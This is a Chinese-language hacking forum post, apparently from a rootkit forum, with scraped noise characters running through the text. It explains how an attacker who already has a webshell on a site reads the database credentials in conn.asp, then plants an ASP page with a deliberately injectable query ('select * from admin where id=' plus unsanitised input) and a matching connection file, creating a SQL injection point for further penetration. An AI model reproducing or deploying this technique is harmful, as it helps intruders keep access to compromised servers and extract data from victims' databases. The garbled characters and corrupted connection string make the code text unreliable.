自己构造注入点方便入侵3 a8 `# B* Y3 V u! Y# r
; P# F" V8 k* k' ~9 ~1 w& k今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
# B5 m- K% S8 d/ J2 D4 f* u3 o) b3 z j- M
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
0 Z: |" \; r! a6 N' D
, H3 Z6 q5 A! Z7 |: m; n首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
# `' P" b' ~4 v/ M. ?5 E
1 v0 t% \2 u: P1 k0 E! Q密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表0 e$ x6 o) U7 x8 [) V( B# p+ x
: Z0 R" E. B8 j7 H
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
, G, L' g3 @, R4 A4 W; u
3 _5 w1 E' R! }; a' F4 s( R程序代码9 ?3 C" ^8 F- J" \! c% h. N N/ T
<!--#include file="xx.asp"-->0 G0 [% O8 B( y! j
<%0 q3 y/ E& }3 k" Z1 K/ U" X# b8 J4 b1 v
set rs=server.createobject("ADODB.recordset")
: h2 {( a+ K+ n" v3 q' R1 K6 jid = request("id")1 U& ?; F# @1 W) r- L5 {) K ?
strSQL = "select * from admin where id=" & id
4 V: N2 u6 q( [* ^# w, wrs.open strSQL,conn,1,33 K s4 _6 `# U
rs.close% ?) c0 G6 M8 r( w- c k
%>
7 \7 q* Q% c k/ Q# e, _2 K7 Z0 `; U( u% w4 O& _: K
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
1 d9 H9 r9 [2 ^1 D( v
4 }# O0 x3 r0 z' S3 ]" ]; Y' t你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
' K/ _6 f, R* B) E' y
; _9 ~- c0 d6 t/ z然后就要构造一个连接数据库的文件了,代码如下:% b7 y# L4 s: ?! |
程序代码* U2 |7 A; p& o2 r) h# B
<% 9 {5 y1 @: l2 @ s) q
strSQLServerName = "000.000.000.000" '服务器名称或地址
7 J: I: z5 V0 z; y5 N0 IstrSQLDBUserName = "sqlname" '数据库帐号
" Q' ]; S7 n0 i+ c s+ KstrSQLDBPassword = "sqlpass" '数据库密码* e7 p# y8 c: I$ J6 Q" z# F. E0 |
strSQLDBName = "sqldataname" '数据库名称0 [/ I3 n7 i0 ^1 g& G
Set conn = Server.CreateObject("ADODB.Connection")
1 [+ h* N8 Z9 `# ^, ]3 _strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"- o) l; q( Z+ j& T! Y: t
conn.open strCon7 e: Z3 S: a8 H
%>! ^6 \" v: d5 U" u! ^9 A* N
' j8 m9 `7 N; k& s5 d0 Z这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
0 v- O T, `8 h
9 g9 ^6 z2 O" }5 g4 i2 Q8 |5 @就这样,正常情况下,就OK了,伪造成功……
a( L& u1 b) D' X# c
7 E' W' p, ?! I8 c: z 如果有什么问题可以提出来大家一起探讨解决。 |